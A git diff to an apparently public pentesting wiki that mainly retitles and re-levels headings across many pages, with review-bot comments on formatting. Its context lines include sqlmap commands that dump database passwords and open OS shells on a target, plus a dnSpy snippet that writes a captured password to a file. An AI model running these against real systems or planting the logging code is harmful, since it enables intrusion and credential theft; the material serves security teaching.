diff --git a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
index bc05f3864..34d841d38 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
@@ -1,3 +1,5 @@
+# Cookie Bomb
+
 {{#include ../../banners/hacktricks-training.md}}
 
 **`Cookie bomb`** involves **adding a significant number of large cookies to a domain and its subdomains targeting a user**. This action results in the victim **sending oversized HTTP requests** to the server, which are subsequently **rejected by the server**. The consequence of this is the induction of a Denial of Service (DoS) specifically targeted at a user within that domain and its subdomains.
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md b/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
index 332ae966c..048ef16f1 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
@@ -1,3 +1,5 @@
+# Cookie Jar Overflow
+
 {{#include ../../banners/hacktricks-training.md}}
 
 The browsers have a **limit on the number of cookies** that they can store for a page. Then, if for some reason you need to **make a cookie disappear**, you can **overflow the cookie jar** as the oldest ones will be deleted before:
diff --git a/src/pentesting-web/idor.md b/src/pentesting-web/idor.md
index 3fbd56fa5..3542595a3 100644
--- a/src/pentesting-web/idor.md
+++ b/src/pentesting-web/idor.md
@@ -1,3 +1,5 @@
+# IDOR (Insecure Direct Object Reference)
+
 {{#include ../banners/hacktricks-training.md}}
 
 **Check the post: [https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)**
diff --git a/src/pentesting-web/login-bypass/sql-login-bypass.md b/src/pentesting-web/login-bypass/sql-login-bypass.md
index bbca02d0d..583a3b07e 100644
--- a/src/pentesting-web/login-bypass/sql-login-bypass.md
+++ b/src/pentesting-web/login-bypass/sql-login-bypass.md
@@ -1,3 +1,5 @@
+# SQL Login Bypass Payloads
+
 {{#include ../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-web/reverse-tab-nabbing.md b/src/pentesting-web/reverse-tab-nabbing.md
index 324c022da..860b0c2fa 100644
--- a/src/pentesting-web/reverse-tab-nabbing.md
+++ b/src/pentesting-web/reverse-tab-nabbing.md
@@ -1,6 +1,8 @@
+# Reverse Tab Nabbing
+
 {{#include ../banners/hacktricks-training.md}}
 
-# Description
+## Description
 
 In a situation where an **attacker** can **control** the **`href`** argument of an **`
+### Examples 
 
 Create the following pages in a folder and run a web server with `python3 -m http.server`\
 Then, **access** `http://127.0.0.1:8000/`vulnerable.html, **click** on the link and note how the **original** **website** **URL** **changes**.
@@ -58,7 +60,7 @@ Then, **access** `http://127.0.0.1:8000/`vulnerable.html, **click** on the link
 
 ```
 
-## Accessible properties 
+### Accessible properties 
 
 In the scenario where a **cross-origin** access occurs (access across different domains), the properties of the **window** JavaScript class instance, referred to by the **opener** JavaScript object reference, that can be accessed by a malicious site are limited to the following:
 
@@ -72,7 +74,7 @@ In the scenario where a **cross-origin** access occurs (access across different
 
 However, in instances where the domains are identical, the malicious site gains access to all properties exposed by the [**window**](https://developer.mozilla.org/en-US/docs/Web/API/Window) JavaScript object reference.
 
-# Prevention
+## Prevention
 
 Prevention information are documented into the [HTML5 Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html#tabnabbing).
 
diff --git a/src/pentesting-web/saml-attacks/saml-basics.md b/src/pentesting-web/saml-attacks/saml-basics.md
index faa2ce5f2..2817e53a8 100644
--- a/src/pentesting-web/saml-attacks/saml-basics.md
+++ b/src/pentesting-web/saml-attacks/saml-basics.md
@@ -1,15 +1,17 @@
+# SAML Basics
+
 {{#include ../../banners/hacktricks-training.md}}
 
-# SAML Overview
+## SAML Overview
 
 **Security Assertion Markup Language (SAML)** enables identity providers (IdP) to be utilized for sending authorization credentials to service providers (SP), facilitating single sign-on (SSO). This approach simplifies the management of multiple logins by allowing a single set of credentials to be used across multiple websites. It leverages XML for standardized communication between IdPs and SPs, linking the authentication of user identity with service authorization.
 
-## Comparison between SAML and OAuth
+### Comparison between SAML and OAuth
 
 - **SAML** is tailored towards providing enterprises with greater control over SSO login security.
 - **OAuth** is designed to be more mobile-friendly, uses JSON, and is a collaborative effort from companies like Google and Twitter.
 
-# SAML Authentication Flow
+## SAML Authentication Flow
 
 **For further details check the full post from [https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)**. This is a summary:
 
@@ -28,7 +30,7 @@ The SAML authentication process involves several steps, as illustrated in the sc
 9. **SAML Response Validation**: The ACS validates the SAML Response.
 10. **Resource Access Granted**: Access to the initially requested resource is granted.
 
-# SAML Request Example
+## SAML Request Example
 
 Consider the scenario where a user requests access to a secure resource at [https://shibdemo-sp1.test.edu/secure/](https://shibdemo-sp1.test.edu/secure/). The SP identifies the lack of authentication and generates a SAML Request:
 
@@ -55,7 +57,7 @@ Key elements of this request include:
 
 Following the SAML Request generation, the SP responds with a **302 redirect**, directing the browser to the IdP with the SAML Request encoded in the HTTP response's **Location** header. The **RelayState** parameter maintains the state information throughout the transaction, ensuring the SP recognizes the initial resource request upon receiving the SAML Response. The **SAMLRequest** parameter is a compressed and encoded version of the raw XML snippet, utilizing Deflate compression and base64 encoding.
 
-# SAML Response Example
+## SAML Response Example
 
 You can find a [full SAML response here](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/). The key components of the response include:
 
@@ -71,7 +73,7 @@ Following the SAML Response, the process includes a 302 redirect from the IdP. T
 
 After the POST request is received and the SAML Response is validated, access is granted to the protected resource initially requested by the user. This is illustrated with a `GET` request to the `/secure/` endpoint and a `200 OK` response, indicating successful access to the resource.
 
-# XML Signatures
+## XML Signatures
 
 XML Signatures are versatile, capable of signing an entire XML tree or specific elements within it. They can be applied to any XML Object, not just Response elements. Below are the key types of XML Signatures:
 
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
index be4318369..5625d40a5 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
@@ -1,6 +1,8 @@
+# Big Binary Files Upload in PostgreSQL
+
 {{#include ../../../banners/hacktricks-training.md}}
 
-### PostgreSQL Large Objects
+## PostgreSQL Large Objects
 
 PostgreSQL offers a structure known as **large objects**, accessible via the `pg_largeobject` table, designed for storing large data types, such as images or PDF documents. This approach is advantageous over the `COPY TO` function as it enables the **exportation of data back to the file system**, ensuring an exact replica of the original file is maintained.
 
@@ -76,7 +78,7 @@ select lo_export(173454, '/path/to/your_file');
 select lo_unlink(173454);  -- Deletes the specified large object
 ```
 
-### Limitations
+## Limitations
 
 It's noted that **large objects may have ACLs** (Access Control Lists), potentially restricting access even to objects created by your user. However, older objects with permissive ACLs may still be accessible for content exfiltration.
 
diff --git a/src/pentesting-web/sql-injection/sqlmap.md b/src/pentesting-web/sql-injection/sqlmap.md
index 4d1ee6aa7..ef97182ed 100644
--- a/src/pentesting-web/sql-injection/sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap.md
@@ -1,8 +1,9 @@
+# SQLMap
 {{#include ../../banners/hacktricks-training.md}}
 
-# Basic arguments for SQLmap
+## Basic arguments for SQLmap
 
-## Generic
+### Generic
 
 ```bash
 -u ""
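Review bot: the added `+# SQLMap` title at the top of this hunk has no blank line between it and the `{{#include ../../banners/hacktricks-training.md}}` banner, unlike every other file in this patch, where the new title is followed by an empty `+` line; the hunk header `-1,8 +1,9` confirms only one line was added here versus two elsewhere. Add the empty line after `# SQLMap` so the heading is separated from the include the same way as in the other pages.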
@@ -21,9 +22,9 @@
 --proxy=PROXY
 ```
 
-## Retrieve Information
+### Retrieve Information
 
-### Internal
+#### Internal
 
 ```bash
 --current-user #Get current user
@@ -33,7 +34,7 @@
 --passwords #Get passwords of users in DB
 ```
 
-### DB data
+#### DB data
 
 ```bash
 --all #Retrieve everything
@@ -44,9 +45,9 @@
 -D  -T  -C  #Dump column
 ```
 
-# Injection place
+## Injection place
 
-## From Burp/ZAP capture
+### From Burp/ZAP capture
 
 Capture the request and create a req.txt file
 
@@ -54,20 +55,20 @@ Capture the request and create a req.txt file
 sqlmap -r req.txt --current-user
 ```
 
-## GET Request Injection
+### GET Request Injection
 
 ```bash
 sqlmap -u "http://example.com/?id=1" -p id
 sqlmap -u "http://example.com/?id=*" -p id
 ```
 
-## POST Request Injection
+### POST Request Injection
 
 ```bash
 sqlmap -u "http://example.com" --data "username=*&password=*"
 ```
 
-## Injections in Headers and other HTTP Methods
+### Injections in Headers and other HTTP Methods
 
 ```bash
 #Inside cookie
@@ -83,14 +84,14 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
 #The injection is located at the '*'
 ```
 
-## Second order injection
+### Second order injection
 
 ```bash
 python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
 sqlmap -r 1.txt -dbms MySQL -second-order "http:///joomla/administrator/index.php" -D "joomla" -dbs
 ```
 
-## Shell
+### Shell
 
 ```bash
 #Exec command
@@ -103,7 +104,7 @@ python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
 python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
 ```
 
-## Crawl a website with SQLmap and auto-exploit
+### Crawl a website with SQLmap and auto-exploit
 
 ```bash
 sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
@@ -113,28 +114,28 @@ sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threa
 --forms = Parse and test forms
 ```
 
-# Customizing Injection
+## Customizing Injection
 
-## Set a suffix
+### Set a suffix
 
 ```bash
 python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
 ```
 
-## Prefix
+### Prefix
 
 ```bash
 python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "
 ```
 
-## Help finding boolean injection
+### Help finding boolean injection
 
 ```bash
 # The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
 sqlmap -r r.txt -p id --not-string ridiculous --batch
 ```
 
-## Tamper
+### Tamper
 
 ```bash
 --tamper=name_of_the_tamper
diff --git a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
index 16957afc2..e7491b7c5 100644
--- a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
@@ -1,3 +1,5 @@
+# Second Order Injection with SQLMap
+
 {{#include ../../../banners/hacktricks-training.md}}
 
 **SQLMap can exploit Second Order SQLis.**\
diff --git a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
index 64262e4c0..455c2c270 100644
--- a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
+++ b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
@@ -1,3 +1,5 @@
+# PDF Injection
+
 {{#include ../../banners/hacktricks-training.md}}
 
 **If your input is being reflected inside a PDF file, you can try to inject PDF data to execute JavaScript or steal the PDF content.**
diff --git a/src/reversing/reversing-tools-basic-methods/angr/README.md b/src/reversing/reversing-tools-basic-methods/angr/README.md
index 2bb827489..87e02f5d6 100644
--- a/src/reversing/reversing-tools-basic-methods/angr/README.md
+++ b/src/reversing/reversing-tools-basic-methods/angr/README.md
@@ -1,8 +1,10 @@
+# Angr
+
 {{#include ../../../banners/hacktricks-training.md}}
 
 Part of this cheatsheet is based on the [angr documentation](https://docs.angr.io/_/downloads/en/stable/pdf/).
 
-# Installation
+## Installation
 
 ```bash
 sudo apt-get install python3-dev libffi-dev build-essential
@@ -12,7 +14,7 @@ source ang/bin/activate
 pip install angr
 ```
 
-# Basic Actions
+## Basic Actions
 
 ```python
 import angr
@@ -32,9 +34,9 @@ proj.filename #Get filename "/bin/true"
 angr.Project('examples/fauxware/fauxware', main_opts={'backend': 'blob', 'arch': 'i386'}, lib_opts={'libc.so.6': {'backend': 'elf'}})
 ```
 
-# Loaded and Main object information
+## Loaded and Main object information
 
-## Loaded Data
+### Loaded Data
 
 ```python
 #LOADED DATA
@@ -59,7 +61,7 @@ proj.loader.all_pe_objects #Get all binaries loaded (Windows)
 proj.loader.find_object_containing(0x400000)#Get object loaded in an address ""
 ```
 
-## Main Object
+### Main Object
 
 ```python
 #Main Object (main binary loaded)
@@ -75,7 +77,7 @@ obj.plt['strcmp'] #Get plt address of a funcion (0x400550)
 obj.reverse_plt[0x400550] #Get function from plt address ('strcmp')
 ```
 
-## Symbols and Relocations
+### Symbols and Relocations
 
 ```python
 strcmp = proj.loader.find_symbol('strcmp') #
@@ -94,7 +96,7 @@ main_strcmp.is_import #True
 main_strcmp.resolvedby #
 ```
 
-## Blocks
+### Blocks
 
 ```python
 #Blocks
@@ -104,9 +106,9 @@ block.instructions #"0xb" Get number of instructions
 block.instruction_addrs #Get instructions addresses "[0x401670, 0x401672, 0x401675, 0x401676, 0x401679, 0x40167d, 0x40167e, 0x40167f, 0x401686, 0x40168d, 0x401694]"
 ```
 
-# Dynamic Analysis
+## Dynamic Analysis
 
-## Simulation Manager, States
+### Simulation Manager, States
 
 ```python
 #Live States
@@ -131,13 +133,13 @@ simgr.step() #Execute one step
 simgr.active[0].regs.rip #Get RIP from the last state
 ```
 
-## Calling functions
+### Calling functions
 
 - You can pass a list of arguments through `args` and a dictionary of environment variables through `env` into `entry_state` and `full_init_state`. The values in these structures can be strings or bitvectors, and will be serialized into the state as the arguments and environment to the simulated execution. The default `args` is an empty list, so if the program you're analyzing expects to find at least an `argv[0]`, you should always provide that!
 - If you'd like to have `argc` be symbolic, you can pass a symbolic bitvector as `argc` to the `entry_state` and `full_init_state` constructors. Be careful, though: if you do this, you should also add a constraint to the resulting state that your value for argc cannot be larger than the number of args you passed into `args`.
 - To use the call state, you should call it with `.call_state(addr, arg1, arg2, ...)`, where `addr` is the address of the function you want to call and `argN` is the Nth argument to that function, either as a python integer, string, or array, or a bitvector. If you want to have memory allocated and actually pass in a pointer to an object, you should wrap it in an PointerWrapper, i.e. `angr.PointerWrapper("point to me!")`. The results of this API can be a little unpredictable, but we're working on it.
 
-## BitVectors
+### BitVectors
 
 ```python
 #BitVectors
@@ -148,7 +150,7 @@ bv.zero_extend(30) #Will add 30 zeros on the left of the bitvector
 bv.sign_extend(30) #Will add 30 zeros or ones on the left of the BV extending the sign
 ```
 
-## Symbolic BitVectors & Constraints
+### Symbolic BitVectors & Constraints
 
 ```python
 x = state.solver.BVS("x", 64) #Symbolic variable BV of length 64
@@ -184,7 +186,7 @@ solver.min(expression) #minimum possible solution to the given expression.
 solver.max(expression) #maximum possible solution to the given expression.
 ```
 
-## Hooking
+### Hooking
 
 ```python
 >>> stub_func = angr.SIM_PROCEDURES['stubs']['ReturnUnconstrained'] # this is a CLASS
@@ -206,7 +208,7 @@ True
 
 Furthermore, you can use `proj.hook_symbol(name, hook)`, providing the name of a symbol as the first argument, to hook the address where the symbol lives
 
-# Examples
+## Examples
 
 {{#include ../../../banners/hacktricks-training.md}}
 
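Review bot: the `## Examples` heading demoted in this hunk has no content under it; the very next line is the closing `{{#include ../../../banners/hacktricks-training.md}}`. An empty section that still shows up in the table of contents is misleading, so either drop the heading or add the examples it promises (the page already states it is based on the angr documentation, which could be cited for them).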
diff --git a/src/reversing/reversing-tools-basic-methods/blobrunner.md b/src/reversing/reversing-tools-basic-methods/blobrunner.md
index a6cd68d9f..5c46864b5 100644
--- a/src/reversing/reversing-tools-basic-methods/blobrunner.md
+++ b/src/reversing/reversing-tools-basic-methods/blobrunner.md
@@ -1,3 +1,5 @@
+# Blobrunner
+
 {{#include ../../banners/hacktricks-training.md}}
 
 The only modified line from the [original code](https://github.com/OALabs/BlobRunner) is the line 10.  
diff --git a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
index 9a1901a41..c604a9f67 100644
--- a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
+++ b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
@@ -1,12 +1,14 @@
+# Satisfiability Modulo Theories (SMT) - Z3
+
 {{#include ../../banners/hacktricks-training.md}}
 
 Very basically, this tool will help us to find values for variables that need to satisfy some conditions and calculating them by hand will be so annoying. Therefore, you can indicate to Z3 the conditions the variables need to satisfy and it will find some values (if possible).
 
 **Some texts and examples are extracted from [https://ericpony.github.io/z3py-tutorial/guide-examples.htm](https://ericpony.github.io/z3py-tutorial/guide-examples.htm)**
 
-# Basic Operations
+## Basic Operations
 
-## Booleans/And/Or/Not
+### Booleans/And/Or/Not
 
 ```python
 #pip3 install z3-solver
@@ -23,7 +25,7 @@ s.check() #If response is "sat" then the model is satifable, if "unsat" somethin
 print(s.model()) #Print valid values to satisfy the model
 ```
 
-## Ints/Simplify/Reals
+### Ints/Simplify/Reals
 
 ```python
 from z3 import *
@@ -45,7 +47,7 @@ set_option(precision=30)
 print(solve(r1**2 + r2**2 == 3, r1**3 == 2))
 ```
 
-## Printing Model
+### Printing Model
 
 ```python
 from z3 import *
@@ -61,7 +63,7 @@ for d in m.decls():
     print("%s = %s" % (d.name(), m[d]))
 ```
 
-# Machine Arithmetic
+## Machine Arithmetic
 
 Modern CPUs and main-stream programming languages use arithmetic over **fixed-size bit-vectors**. Machine arithmetic is available in Z3Py as **Bit-Vectors**.
 
@@ -80,7 +82,7 @@ b = BitVecVal(65535, 32)
 print(simplify(a == b)) #This is False
 ```
 
-## Signed/Unsigned Numbers
+### Signed/Unsigned Numbers
 
 Z3 provides special signed versions of arithmetical operations where it makes a difference whether the **bit-vector is treated as signed or unsigned**. In Z3Py, the operators **<, <=, >, >=, /, % and >>** correspond to the **signed** versions. The corresponding **unsigned** operators are **ULT, ULE, UGT, UGE, UDiv, URem and LShR.**
 
@@ -102,7 +104,7 @@ solve(x < 0)
 solve(ULT(x, 0))
 ```
 
-## Functions
+### Functions
 
 **Interpreted functio**ns such as arithmetic where the **function +** has a **fixed standard interpretation** (it adds two numbers). **Uninterpreted functions** and constants are **maximally flexible**; they allow **any interpretation** that is **consistent** with the **constraints** over the function or constant.
 
@@ -127,9 +129,9 @@ s.check()
 print(m.model())
 ```
 
-# Examples
+## Examples
 
-## Sudoku solver
+### Sudoku solver
 
 ```python
 # 9x9 matrix of integer variables
diff --git a/src/reversing/reversing-tools/README.md b/src/reversing/reversing-tools/README.md
index ca9f57426..246632d3f 100644
--- a/src/reversing/reversing-tools/README.md
+++ b/src/reversing/reversing-tools/README.md
@@ -1,21 +1,23 @@
+# Reversing Tools
+
 {{#include ../../banners/hacktricks-training.md}}
 
-# Wasm Decompilation and Wat Compilation Guide
 
+## Wasm Decompilation and Wat Compilation Guide
 In the realm of **WebAssembly**, tools for **decompiling** and **compiling** are essential for developers. This guide introduces some online resources and software for handling **Wasm (WebAssembly binary)** and **Wat (WebAssembly text)** files.
 
-## Online Tools
+### Online Tools
 
 - To **decompile** Wasm to Wat, the tool available at [Wabt's wasm2wat demo](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) comes in handy.
 - For **compiling** Wat back to Wasm, [Wabt's wat2wasm demo](https://webassembly.github.io/wabt/demo/wat2wasm/) serves the purpose.
 - Another decompilation option can be found at [web-wasmdec](https://wwwg.github.io/web-wasmdec/).
 
-## Software Solutions
+### Software Solutions
 
 - For a more robust solution, [JEB by PNF Software](https://www.pnfsoftware.com/jeb/demo) offers extensive features.
 - The open-source project [wasmdec](https://github.com/wwwg/wasmdec) is also available for decompilation tasks.
 
-# .Net Decompilation Resources
+## .Net Decompilation Resources
 
 Decompiling .Net assemblies can be accomplished with tools such as:
 
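Review bot: the blank line ended up on the wrong side of the new heading in the first change of this hunk: `-# Wasm Decompilation and Wat Compilation Guide` was removed, the empty line below it kept, and `+## Wasm Decompilation and Wat Compilation Guide` inserted directly above the `In the realm of **WebAssembly**` paragraph. The result is two blank lines after the banner include and none between the heading and its paragraph, which is inconsistent with the other headings in this file (e.g. `## .Net Decompilation Resources` further down, which keeps its blank line). Move the `+## Wasm ...` line above the empty line.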
@@ -23,19 +25,19 @@ Decompiling .Net assemblies can be accomplished with tools such as:
 - For tasks involving **decompilation**, **modification**, and **recompilation**, [dnSpy](https://github.com/0xd4d/dnSpy/releases) is highly recommended. **Right-clicking** a method and choosing **Modify Method** enables code changes.
 - [JetBrains' dotPeek](https://www.jetbrains.com/es-es/decompiler/) is another alternative for decompiling .Net assemblies.
 
-## Enhancing Debugging and Logging with DNSpy
+### Enhancing Debugging and Logging with DNSpy
 
-### DNSpy Logging
+#### DNSpy Logging
 
 To log information to a file using DNSpy, incorporate the following .Net code snippet:
 
-%%%cpp
+```cpp
 using System.IO;
 path = "C:\\inetpub\\temp\\MyTest2.txt";
 File.AppendAllText(path, "Password: " + password + "\n");
-%%%
+```
 
-### DNSpy Debugging
+#### DNSpy Debugging
 
 For effective debugging with DNSpy, a sequence of steps is recommended to adjust **Assembly attributes** for debugging, ensuring that optimizations that could hinder debugging are disabled. This process includes changing the `DebuggableAttribute` settings, recompiling the assembly, and saving the changes.
 
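Review bot: the fence was changed from `%%%cpp` to a triple-backtick fence still tagged `cpp`, but the snippet is C#/.NET code (`using System.IO;`, `File.AppendAllText`), so the highlighter tag should be `csharp` (or `cs`) rather than `cpp`. While this block is being touched, note that `path = "C:\\inetpub\\temp\\MyTest2.txt";` has no declaration; `string path = ...` would make the snippet paste-ready in dnSpy's method editor.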
@@ -85,14 +87,14 @@ To decompile Java bytecode, these tools can be very helpful:
 ### Deobfuscation and Analysis
 
 - **scdbg** provides insights into shellcode functions and deobfuscation capabilities.
-  %%%bash
+  ```bash
   scdbg.exe -f shellcode # Basic info
   scdbg.exe -f shellcode -r # Analysis report
   scdbg.exe -f shellcode -i -r # Interactive hooks
   scdbg.exe -f shellcode -d # Dump decoded shellcode
   scdbg.exe -f shellcode /findsc # Find start offset
   scdbg.exe -f shellcode /foff 0x0000004D # Execute from offset
-  %%%
+  ```
 
 - **CyberChef** for disassembling shellcode: [CyberChef recipe](https://gchq.github.io/CyberChef/#recipe=To_Hex%28'Space',0%29Disassemble_x86%28'32','Full%20x86%20architecture',16,0,true,true%29)
 
diff --git a/src/todo/6881-udp-pentesting-bittorrent.md b/src/todo/6881-udp-pentesting-bittorrent.md
deleted file mode 100644
index 1fffcb957..000000000
--- a/src/todo/6881-udp-pentesting-bittorrent.md
+++ /dev/null
@@ -1,6 +0,0 @@
-{{#include ../banners/hacktricks-training.md}}
-
-{{#include ../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/todo/burp-suite.md b/src/todo/burp-suite.md
index 62d07e098..fa8aa1b0c 100644
--- a/src/todo/burp-suite.md
+++ b/src/todo/burp-suite.md
@@ -1,6 +1,8 @@
+# Burp Suite
+
 {{#include ../banners/hacktricks-training.md}}
 
-# Basic Payloads
+## Basic Payloads
 
 - **Simple List:** Just a list containing an entry in each line
 - **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists.
diff --git a/src/todo/interesting-http.md b/src/todo/interesting-http.md
index 11f37f9b2..cf0ee0033 100644
--- a/src/todo/interesting-http.md
+++ b/src/todo/interesting-http.md
@@ -1,14 +1,16 @@
+# Interesting HTTP
+
 {{#include ../banners/hacktricks-training.md}}
 
-# Referrer headers and policy
+## Referrer headers and policy
 
 Referrer is the header used by browsers to indicate which was the previous page visited.
 
-## Sensitive information leaked
+### Sensitive information leaked
 
 If at some point inside a web page any sensitive information is located on a GET request parameters, if the page contains links to external sources or an attacker is able to make/suggest (social engineering) the user visit a URL controlled by the attacker. It could be able to exfiltrate the sensitive information inside the latest GET request.
 
-## Mitigation
+### Mitigation
 
 You can make the browser follow a **Referrer-policy** that could **avoid** the sensitive information to be sent to other web applications:
 
@@ -23,7 +25,7 @@ Referrer-Policy: strict-origin-when-cross-origin
 Referrer-Policy: unsafe-url
 ```
 
-## Counter-Mitigation
+### Counter-Mitigation
 
 You can override this rule using an HTML meta tag (the attacker needs to exploit and HTML injection):
 
diff --git a/src/todo/misc.md b/src/todo/misc.md
index c2bdbee52..4bcf325f7 100644
--- a/src/todo/misc.md
+++ b/src/todo/misc.md
@@ -1,3 +1,5 @@
+# Misc
+
 {{#include ../banners/hacktricks-training.md}}
 
 In a ping response TTL:\
diff --git a/src/todo/more-tools.md b/src/todo/more-tools.md
index 9e13a3f70..1a71c295b 100644
--- a/src/todo/more-tools.md
+++ b/src/todo/more-tools.md
@@ -1,7 +1,9 @@
+# More tools
+
 {{#include ../banners/hacktricks-training.md}}
 
 
-# BlueTeam
+## BlueTeam
 
 - [https://github.com/yarox24/attack_monitor](https://github.com/yarox24/attack_monitor)
 - [https://capsule8.com/blog/dont-get-kicked-out-a-tale-of-rootkits-and-other-backdoors/](https://capsule8.com/blog/dont-get-kicked-out-a-tale-of-rootkits-and-other-backdoors/)
@@ -9,7 +11,7 @@
 - [https://github.com/PaperMtn/lil-pwny](https://github.com/PaperMtn/lil-pwny) : Check disclosed accounts
 - [https://github.com/rabobank-cdc/DeTTECT](https://github.com/rabobank-cdc/DeTTECT)
 
-# OSINT
+## OSINT
 
 - [https://github.com/3vangel1st/kamerka](https://github.com/3vangel1st/kamerka)
 - [https://github.com/BullsEye0/google_dork_list](https://github.com/BullsEye0/google_dork_list)
@@ -30,7 +32,7 @@
 - [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks)
 - [https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/sys/tools/subdomainfinder/) : 8 Subdomain finder tools, sublist3r, amass and more
 
-# **WEB**
+## **WEB**
 
 - [https://github.com/AlisamTechnology/ATSCAN](https://github.com/AlisamTechnology/ATSCAN)
 - [https://github.com/momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder)
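Review bot: `## **WEB**` keeps bold markup and all-caps inside the heading, unlike the sibling headings `## OSINT` and `## Windows` retitled in the same file; suggest `## Web` (and `## Other` for the `## OTHER` heading further down) for consistency.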
@@ -57,7 +59,7 @@
 - [https://github.com/Quitten/Autorize](https://github.com/Quitten/Autorize) : Automatic authentication tests (remove cookies and try to send the request)
 - [https://github.com/pikpikcu/xrcross](https://github.com/pikpikcu/xrcross): XRCross is a Reconstruction, Scanner, and a tool for penetration / BugBounty testing. This tool was built to test (XSS|SSRF|CORS|SSTI|IDOR|RCE|LFI|SQLI) vulnerabilities
 
-# Windows
+## Windows
 
 - [https://github.com/Mr-Un1k0d3r/PoisonHandler](https://github.com/Mr-Un1k0d3r/PoisonHandler) : Lateral movements
 - [https://freddiebarrsmith.com/trix/trix.html](https://freddiebarrsmith.com/trix/trix.html) : LOL bins
@@ -73,7 +75,7 @@
 - [https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/](https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/) : Track who open a document
 - [https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet](https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet) : Active Directory Cheat Sheet
 
-# Firmware
+## Firmware
 
 Tools q veo q pueden molar para analizar firmares (automaticas):
 
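Review bot: the unchanged context line directly under the new `## Firmware` heading is still Spanish (`Tools q veo q pueden molar para analizar firmares (automaticas):`), on an otherwise English page; while retitling, it should become something like `Tools that look useful for (automated) firmware analysis:`.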
@@ -94,7 +96,7 @@ y por aqui la metodologia owasp para analizar firmware: [https://github.com/scri
 
 Firmware emulation: FIRMADYNE (https://github.com/firmadyne/firmadyne/) is a platform for automating the emulation and dynamic analysis of Linux-based firmware.
 
-# OTHER
+## OTHER
 
 - [https://twitter.com/HackAndDo/status/1202695084543791117](https://twitter.com/HackAndDo/status/1202695084543791117)
 - [https://github.com/weev3/LKWA](https://github.com/weev3/LKWA)
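Review bot: `## OTHER` keeps the all-caps style; `## Other` would match the other retitled sections. The hunk's header context is also still Spanish (`y por aqui la metodologia owasp para analizar firmware`, i.e. `and here the OWASP methodology for analysing firmware`) and should be translated in the same commit.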
diff --git a/src/todo/pentesting-dns.md b/src/todo/pentesting-dns.md
deleted file mode 100644
index b8527a78f..000000000
--- a/src/todo/pentesting-dns.md
+++ /dev/null
@@ -1,12 +0,0 @@
-{{#include ../banners/hacktricks-training.md}}
-
-**Research more about attacks to DNS**
-
-**DNSSEC and DNSSEC3**
-
-**DNS in IPv6**
-
-{{#include ../banners/hacktricks-training.md}}
-
-
-
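Review bot: deleting this stub is reasonable, since it holds only three bold placeholders and the banner include, but the matching `SUMMARY.md` entry and any `{{#ref}}` pointing at `todo/pentesting-dns.md` must go in the same commit or the mdBook build will report a missing chapter. If the TODO items are still wanted somewhere, note that `DNSSEC3` in the deleted text presumably meant NSEC3.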
diff --git a/src/todo/post-exploitation.md b/src/todo/post-exploitation.md
index 9fee7c27c..347763ed1 100644
--- a/src/todo/post-exploitation.md
+++ b/src/todo/post-exploitation.md
@@ -1,3 +1,5 @@
+# Post Exploitation
+
 {{#include ../banners/hacktricks-training.md}}
 
 ## **Local l00t**
diff --git a/src/todo/references.md b/src/todo/references.md
deleted file mode 100644
index eb3792a1f..000000000
--- a/src/todo/references.md
+++ /dev/null
@@ -1,95 +0,0 @@
